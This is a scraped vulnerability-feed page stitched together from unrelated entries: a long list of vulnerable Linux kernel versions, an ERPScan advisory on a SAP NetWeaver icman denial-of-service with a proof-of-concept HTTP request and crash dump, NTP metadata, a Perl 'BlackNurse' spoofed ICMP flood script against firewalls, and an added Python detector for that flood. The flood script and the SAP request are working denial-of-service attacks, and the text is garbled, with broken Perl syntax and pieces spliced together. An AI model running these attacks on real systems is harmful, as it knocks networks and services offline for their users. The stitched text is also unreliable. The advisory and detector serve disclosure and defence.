Denial

Vulnerable: Linux kernel 4.2.3
Linux kernel 4.1.4
Linux kernel 4.1.1
Linux kernel 4.0.6
Linux kernel 3.19.3
Linux kernel 3.18.22
Linux kernel 3.18.17
Linux kernel 3.18.11
Linux kernel 3.18.8
Linux kernel 3.18.7
Linux kernel 3.18.3
Linux kernel 3.18.2
Linux kernel 3.18.1
Linux kernel 3.17.4
Linux kernel 3.17.2
Linux kernel 3.16.7
Linux kernel 3.16.2
Linux kernel 3.16.1
Linux kernel 3.15.10
Linux kernel 3.15.5
Linux kernel 3.15.2
Linux kernel 3.14.54
Linux kernel 3.14.45
Linux kernel 3.14.37
Linux kernel 3.14.4
Linux kernel 3.14.3
Linux kernel 3.14.2
Linux kernel 3.13.11
Linux kernel 3.13.9
Linux kernel 3.13.3
Linux kernel 3.13.1
Linux kernel 3.12.49
Linux kernel 3.12.48
Linux kernel 3.12.44
Linux kernel 3.12.40
Linux kernel 3.12.21
Linux kernel 3.12.18
Linux kernel 3.12.17
Linux kernel 3.12.16
Linux kernel 3.12.11
Linux kernel 3.12.7
Linux kernel 3.12.4
Linux kernel 3.12.3
Linux kernel 3.12.2
Linux kernel 3.11.3
Linux kernel 3.10.90
Linux kernel 3.10.81
Linux kernel 3.10.73
Linux kernel 3.10.45
Linux kernel 3.10.41
Linux kernel 3.10.38
Linux kernel 3.10.37
Linux kernel 3.10.36
Linux kernel 3.10.30
Linux kernel 3.10.27
Linux kernel 3.10.26
Linux kernel 3.10.23
Linux kernel 3.10.22
Linux kernel 3.10.21
Linux kernel 3.10.14
Linux kernel 3.10.10
Linux kernel 3.10.9
Linux kernel 3.10.7
Linux kernel 3.8.9
Linux kernel 3.8.6
Linux kernel 3.8.5
Linux kernel 3.8.4
Linux kernel 3.8.2
Linux kernel 3.8.1
Linux kernel 3.7.10
Linux kernel 3.7.9
Linux kernel 3.7.8
Linux kernel 3.7.7
Linux kernel 3.7.5
Linux kernel 3.7.4
Linux kernel 3.7.3
Linux kernel 3.7.2
Linux kernel 3.7.1
Linux kernel 3.6.11
Linux kernel 3.6.10
Linux kernel 3.6.9
Linux kernel 3.6.8
Linux kernel 3.6.7
Linux kernel 3.6.6
Linux kernel 3.6.5
Linux kernel 3.6.4
Linux kernel 3.6.3
Linux kernel 3.6.2
Linux kernel 3.6.1
Linux kernel 3.5.7
Linux kernel 3.5.6
Linux kernel 3.5.5
Linux kernel 3.5.4
Linux kernel 3.5.3
Linux kernel 3.5.2
Linux kernel 3.5.1
Linux kernel 3.4.88
Linux kernel 3.4.87
Linux kernel 3.4.86
Linux kernel 3.4.80
Linux kernel 3.4.76
Linux kernel 3.4.73
Linux kernel 3.4.72
Linux kernel 3.4.71
Linux kernel 3.4.64
Linux kernel 3.4.58
Linux kernel 3.4.42
Linux kernel 3.4.36
Linux kernel 3.4.32
Linux kernel 3.4.31
Linux kernel 3.4.27
Linux kernel 3.4.26
Linux kernel 3.4.25
Linux kernel 3.4.21
Linux kernel 3.4.20
Linux kernel 3.4.19
Linux kernel 3.4.18
Linux kernel 3.4.17
Linux kernel 3.4.16
Linux kernel 3.4.15
Linux kernel 3.4.14
Linux kernel 3.4.13
Linux kernel 3.4.12
Linux kernel 3.4.11
Linux kernel 3.4.10
Linux kernel 3.4.9
Linux kernel 3.4.8
Linux kernel 3.4.7
Linux kernel 3.4.6
Linux kernel 3.4.5
Linux kernel 3.4.4
Linux kernel 3.4.3
Linux kernel 3.4.2
Linux kernel 3.4.1
Linux kernel 3.3.5
Linux kernel 3.3.4
Linux kernel 3.3.2
Linux kernel 3.2.82
Linux kernel 3.2.72
Linux kernel 3.2.62
Linux kernel 3.2.57
Linux kernel 3.2.56
Linux kernel 3.2.51
Linux kernel 3.2.24
Linux kernel 3.2.23
Linux kernel 3.2.13
Linux kernel 3.2.12
Linux kernel 3.2.9
Linux kernel 3.2.1
Linux kernel 3.1.8
Linux kernel 3.0.98
Linux kernel 3.0.75
Linux kernel 3.0.72
Linux kernel 3.0.69
Linux kernel 3.0.65
Linux kernel 3.0.60
Linux kernel 3.0.59
Linux kernel 3.0.58
Linux kernel 3.0.37
Linux kernel 3.0.34
Linux kernel 3.0.5
Linux kernel 3.0.4
Linux kernel 3.0.2
Linux kernel 3.0.1
Linux kernel 2.6.39
Linux kernel 2.6.38
Linux kernel 2.6.37
Linux kernel 2.6.36
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.33 .1
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 13
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31
Linux kernel 2.6.30 .10
Linux kernel 2.6.30 .1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .46
Linux kernel 2.6.27 .24
Linux kernel 2.6.27 .14
Linux kernel 2.6.27 .13
Linux kernel 2.6.27 .12
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 .4
Linux kernel 2.6.26 .3
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .7
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .2
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22 .1
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .3
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .7
Linux kernel 2.6.20 .6
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 .14
Linux kernel 2.6.20 .12
Linux kernel 2.6.20 .10
Linux kernel 2.6.20 .1
Linux kernel 2.6.20
Linux kernel 2.6.19 .4
Linux kernel 2.6.19 .3
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19
Linux kernel 2.6.18 .8
Linux kernel 2.6.18 .7
Linux kernel 2.6.18 .6
Linux kernel 2.6.18 .5
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .2
Linux kernel 2.6.18 .1
Linux kernel 2.6.17 .9
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .4
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .6
Linux kernel 2.6.16 .53
Linux kernel 2.6.16 .52
Linux kernel 2.6.16 .51
Linux kernel 2.6.16 .50
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .49
Linux kernel 2.6.16 .48
Linux kernel 2.6.16 .47
Linux kernel 2.6.16 .46
Linux kernel 2.6.16 .45
Linux kernel 2.6.16 .44
Linux kernel 2.6.16 .43
Linux kernel 2.6.16 .41
Linux kernel 2.6.16 .40
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .39
Linux kernel 2.6.16 .38
Linux kernel 2.6.16 .37
Linux kernel 2.6.16 .36
Linux kernel 2.6.16 .35
Linux kernel 2.6.16 .34
Linux kernel 2.6.16 .33
Linux kernel 2.6.16 .32
Linux kernel 2.6.16 .31
Linux kernel 2.6.16 .30
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .29
Linux kernel 2.6.16 .28
Linux kernel 2.6.16 .27
Linux kernel 2.6.16 .26
Linux kernel 2.6.16 .25
Linux kernel 2.6.16 .24
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .22
Linux kernel 2.6.16 .21
Linux kernel 2.6.16 .20
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .18
Linux kernel 2.6.16 .17
Linux kernel 2.6.16 .16
Linux kernel 2.6.16 .15
Linux kernel 2.6.16 .14
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .10
Linux kernel 2.6.16 .1
Linux kernel 2.6.16
Linux kernel 2.6.15 .7
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15
Linux kernel 2.6.14 .7
Linux kernel 2.6.14 .6
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14
Linux kernel 2.6.13 .5
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12
Linux kernel 2.6.11 .9
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .3
Linux kernel 2.6.11 .2
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 .10
Linux kernel 2.6.11 .1
Linux kernel 2.6.11
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8
Linux kernel 2.6.7
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6
Linux kernel 4.4
Linux kernel 4.3.3
Linux kernel 4.3-rc1
Linux kernel 4.2.8
Linux kernel 4.2
Linux kernel 4.1.15
Linux kernel 4.1-rc7
Linux kernel 4.1-rc6
Linux kernel 4.1-rc3
Linux kernel 4.1-rc1
Linux kernel 4.1
Linux kernel 4.0.5
Linux kernel 4.0
Linux kernel 3.9.8
Linux kernel 3.9.4
Linux kernel 3.9
Linux kernel 3.8
Linux kernel 3.7.6
Linux kernel 3.7
Linux kernel 3.6
Linux kernel 3.5
Linux kernel 3.4.93
Linux kernel 3.4.81
Linux kernel 3.4.70
Linux kernel 3.4.67
Linux kernel 3.4.29
Linux kernel 3.4
Linux kernel 3.3
Linux kernel 3.2.81
Linux kernel 3.2.78
Linux kernel 3.2.65
Linux kernel 3.2.64
Linux kernel 3.2.63-2
Linux kernel 3.2.63
Linux kernel 3.2.60
Linux kernel 3.2.55
Linux kernel 3.2.54
Linux kernel 3.2.53
Linux kernel 3.2.52
Linux kernel 3.2.50
Linux kernel 3.2.44
Linux kernel 3.2.42
Linux kernel 3.2.38
Linux kernel 3.2.2
Linux kernel 3.2
Linux kernel 3.19
Linux kernel 3.18.9
Linux kernel 3.18
Linux kernel 3.17.6
Linux kernel 3.17
Linux kernel 3.16.6
Linux kernel 3.16.36
Linux kernel 3.16
Linux kernel 3.15
Linux kernel 3.14.73
Linux kernel 3.14.7
Linux kernel 3.14.5
Linux kernel 3.14-4
Linux kernel 3.14-1
Linux kernel 3.14
Linux kernel 3.13.7
Linux kernel 3.13.6
Linux kernel 3.13.5
Linux kernel 3.13.4
Linux kernel 3.13
Linux kernel 3.12.22
Linux kernel 3.12.15
Linux kernel 3.12.14
Linux kernel 3.12.12
Linux kernel 3.12.1
Linux kernel 3.12
Linux kernel 3.11.9
Linux kernel 3.11.6
Linux kernel 3.11
Linux kernel 3.10.5
Linux kernel 3.10.43
Linux kernel 3.10.31
Linux kernel 3.10.20
Linux kernel 3.10.17
Linux kernel 3.10
Linux kernel 3.1
Linux kernel 3.0.66
Linux kernel 3.0.62
Linux kernel 3.0.18
Linux kernel 3.0
Linux kernel 2.6.8.1
Linux kernel 2.6.38.6
Linux kernel 2.6.38.4
Linux kernel 2.6.38.3
Linux kernel 2.6.38.2
Linux kernel 2.6.37.2
Linux kernel 2.6.35.5
Linux kernel 2.6.35.4
Linux kernel 2.6.35.13
Linux kernel 2.6.35.1
Linux kernel 2.6.34.3
Linux kernel 2.6.34.2
Linux kernel 2.6.34.14
Linux kernel 2.6.34.13
Linux kernel 2.6.34.1
Linux kernel 2.6.33.7
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.62
Linux kernel 2.6.32.61
Linux kernel 2.6.32.60
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.4
Linux kernel 2.6.32.3
Linux kernel 2.6.32.28
Linux kernel 2.6.32.22
Linux kernel 2.6.32.2
Linux kernel 2.6.32.18
Linux kernel 2.6.32.17
Linux kernel 2.6.32.16
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Linux kernel 2.6.27.54
Linux kernel 2.6.27.51
Linux kernel 2.6.27.49
Linux kernel 2.6.27.26
Linux kernel 2.6.26.1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24.4
Linux kernel 2.6.24.3
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20-2
Linux kernel 2.6.18.1
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.16.9
Linux kernel 2.6.16.7
Linux kernel 2.6.16.19
Linux kernel 2.6.16.13
Linux kernel 2.6.16.12
Linux kernel 2.6.16.11
Linux kernel 2.6.15.5
Linux kernel 2.6.15.4
Linux kernel 2.6.15.11
Linux kernel 2.6.14.3
Linux kernel 2.6.14.2
Linux kernel 2.6.14.1
Linux kernel 2.6.13.4
Linux kernel 2.6.13.3
Linux kernel 2.6.13.2
Linux kernel 2.6.13.1
Linux kernel 2.6.12.6
Linux kernel 2.6.12.5
Linux kernel 2.6.12.4
Linux kernel 2.6.12.3
Linux kernel 2.6.12.2
Linux kernel 2.6.12.1
Linux kernel 2.6.11.8
Linux kernel 2.6.11.7
Linux kernel 2.6.11.6
Linux kernel 2.6.11.5
Linux kernel 2.6.11.4
Linux kernel 2.6.11.12
Linux kernel 2.6.11.11


SecurityFocus Vulnerabilities

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: Denial of Service

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2313835

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-033] SAP NetWeaver AS JAVA icman – DoS vulnerability

Advisory ID: [ERPSCAN-16-033]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-033-sap-netweaver-java-icman-dos-vulnerability/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Denial of Service

Impact: Denial of Service

Remotely Exploitable: yes

Locally Exploitable: yes

CVSS Information

CVSS Base Score v3: 7.5 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality None (N)

I : Impact to Integrity None (N)

A : Impact to Availability High (H)

3. VULNERABILITY DESCRIPTION

An unauthenticated attacker can cause a denial of service by using P4 over HTTPS.

4. VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT

SAP KERNEL 7.21 32-BIT UNICODE

SAP KERNEL 7.21 64-BIT

SAP KERNEL 7.21 64-BIT UNICODE

SAP KERNEL 7.21 EXT 32-BIT

SAP KERNEL 7.21 EXT 32-BIT UC

SAP KERNEL 7.21 EXT 64-BIT

SAP KERNEL 7.21 EXT 64-BIT UC

SAP KERNEL 7.22 64-BIT

SAP KERNEL 7.22 64-BIT UNICODE

SAP KERNEL 7.22 EXT 64-BIT

SAP KERNEL 7.22 EXT 64-BIT UC

SAP KERNEL 7.42 64-BIT

SAP KERNEL 7.42 64-BIT UNICODE

SAP KERNEL 7.45 64-BIT

SAP KERNEL 7.45 64-BIT UNICODE

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2313835.

6. AUTHOR

Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION

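The vulnerability is triggered when an HTTPS GET request is sent to the SAP NetWeaver P4 service. In the debugger output that follows the PoC, icman faults in P4PlugInReadHandler on a read from [rdi+4] while rdi is zero.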

PoC

```
GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1
Host: 172.16.10.65:50005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

```

```
0:007> r
rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0
rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000
rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40
r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20
r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000
r14=0000000000000000 r15=0000000000000001
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
icman!P4PlugInReadHandler+0xb9:
00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas2_rel\src\krn\si\ic\p4_plg.c @ 1192]
00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 5088]
00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 4808]
00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 3840]
00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43
00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf
00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd
00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
```

8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

9. REFERENCES

[ERPSCAN-16-033] SAP NetWeaver AS JAVA icman – DoS vulnerability

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents (e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project, which is focused on
enterprise application security awareness and publishes annual SAP
security research.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them, there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
"Emerging Vendor" in Security by CRN, listed among "TOP 100 SAP
Solution providers" and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan's primary mission is to close the gap between technical and
business security and provide solutions for CISOs to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We "follow the sun" and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security


Exploit Files ≈ Packet Storm

Bugtraq ID: 94455
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-7433
Remote: No
Local: Yes
Published: Nov 21 2016 12:00AM
Updated: Nov 22 2016 12:12AM
Credit: Brian Utterback of Oracle, and Sharon Goldberg and Aanchal Malhotra of Boston University.

Vulnerable: NTP NTP 4.3.90
NTP NTP 4.2.8
NTP NTP 4.1.2
NTP NTP 4.3.93
NTP NTP 4.3.92
NTP NTP 4.2.8p8
NTP NTP 4.2.8p7
NTP NTP 4.2.8p6
NTP NTP 4.2.8p5
NTP NTP 4.2.8p4
NTP NTP 4.2.8p3-RC1
NTP NTP 4.2.8p3
NTP NTP 4.2.8p2
NTP NTP 4.2.8p1
NTP NTP 4.2.7p385

Not Vulnerable: NTP NTP 4.3.94
NTP NTP 4.2.8p9


SecurityFocus Vulnerabilities

 #!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet |
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
# of service to well known firewalls. Most ICMP attacks that we see are based
# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
# effective even at low bandwidth. Low bandwidth is in this case around 15-18
# Mbit/s. This is to achieve the volume of packets needed which is around 40 to
# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
# connection. The impact we see on different firewalls is typically high CPU
# loads. When an attack is ongoing, users from the LAN side will no longer be
# able to send/receive traffic to/from the Internet. All firewalls we have seen
# recover when the attack stops.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Thanks to Maya (Maiya|Mia) Hristova and all my friends
# that support me.
#
#

use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: $ 0 <spoofed address> <target>\n";
print "[ Example: perl $ 0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $ spoof = $ ARGV[0];
my $ target = $ ARGV[1];

my $ sock = new Net::RawIP( icmp => { }) or die;

print "[ Sending crafted packets..\n";
while ()
$ sock->set({ ip => { saddr => $ spoof, daddr => $ target,
icmp => type => 3, code => 3 });
$ sock->send;
$ sock->set( icmp => { type=>3, code => 0});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 1});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 2});
$ sock->send;
}
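
A detection-side companion to the description in the script header above, as an added example that is not part of the original post or its author's code: it counts ICMP Type 3 Code 3 packets per destination per second from captured IPv4 packets. The function names, the alert threshold and the sample packets are assumptions constructed for illustration.

```python
import struct
from collections import Counter, defaultdict
from ipaddress import IPv4Address

# Assumed alert threshold, set well below the 40-50K packets per second
# that the description says the attack needs. Tune to your own baseline.
DEFAULT_THRESHOLD_PPS = 10_000


def parse_icmp(packet):
    """Return (src, dst, icmp_type, icmp_code) for an IPv4 ICMP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None                      # too short or not IPv4
    ihl = (packet[0] & 0x0F) * 4         # IPv4 header length in bytes
    if ihl < 20 or len(packet) < ihl + 2 or packet[9] != 1:
        return None                      # malformed header or protocol is not ICMP
    src, dst = struct.unpack("!4s4s", packet[12:20])
    return str(IPv4Address(src)), str(IPv4Address(dst)), packet[ihl], packet[ihl + 1]


def detect_blacknurse(events, threshold_pps=DEFAULT_THRESHOLD_PPS):
    """events: iterable of (timestamp_seconds, raw_ipv4_packet).

    Counts ICMP Type 3 Code 3 packets per destination in one-second buckets.
    The key is the destination, because the source address may be spoofed.
    """
    buckets = defaultdict(Counter)       # (dst, second) -> Counter of source addresses
    for ts, pkt in events:
        parsed = parse_icmp(pkt)
        if parsed is None:
            continue
        src, dst, icmp_type, icmp_code = parsed
        if icmp_type == 3 and icmp_code == 3:
            buckets[(dst, int(ts))][src] += 1

    alerts = []
    for (dst, second), sources in sorted(buckets.items()):
        total = sum(sources.values())
        if total >= threshold_pps:
            alerts.append({"dst": dst, "second": second,
                           "pps": total, "sources": len(sources)})
    return alerts


def build_icmp(src, dst, icmp_type, icmp_code):
    """Build a constructed 28-byte IPv4+ICMP packet (checksums left at zero)."""
    ip_header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, 1, 0,
                            IPv4Address(src).packed, IPv4Address(dst).packed)
    icmp_header = struct.pack("!BBHI", icmp_type, icmp_code, 0, 0)
    return ip_header + icmp_header


def sample_capture():
    """Constructed sample: 50 Type 3 Code 3 packets to 192.0.2.1 within second 100,
    20 echo requests in the same second, and one Type 3 Code 3 in second 101."""
    events = [(100.0 + i / 100, build_icmp("198.51.100.7", "192.0.2.1", 3, 3))
              for i in range(50)]
    events += [(100.5, build_icmp("203.0.113.9", "192.0.2.1", 8, 0))] * 20
    events.append((101.2, build_icmp("203.0.113.9", "192.0.2.1", 3, 3)))
    return events


if __name__ == "__main__":
    # A low threshold is used here only so the small constructed sample trips it.
    for alert in detect_blacknurse(sample_capture(), threshold_pps=40):
        print(alert)
```

Because the rate is keyed on the destination, the alert fires regardless of how many source addresses the packets claim to come from.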


Exploit Files ≈ Packet Storm

Bugtraq ID: 93150
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6304
Remote: Yes
Local: No
Published: Sep 23 2016 12:00AM
